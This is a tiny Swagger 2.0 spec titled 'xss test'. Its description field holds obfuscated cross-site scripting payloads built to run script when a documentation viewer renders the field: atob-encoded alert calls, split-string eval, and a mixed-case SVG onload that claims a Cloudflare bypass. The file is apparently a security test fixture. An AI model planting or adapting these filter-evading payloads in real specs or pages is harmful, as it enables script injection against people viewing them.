swagger: '2.0'
info:
  title: xss test
  description: |
   123<h1>123</h1><img src=x onerror="Function`a${atob`YWxlcnQoMSk=`}```"><img src="x" onerror="eval('al'+'ert(1)')"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
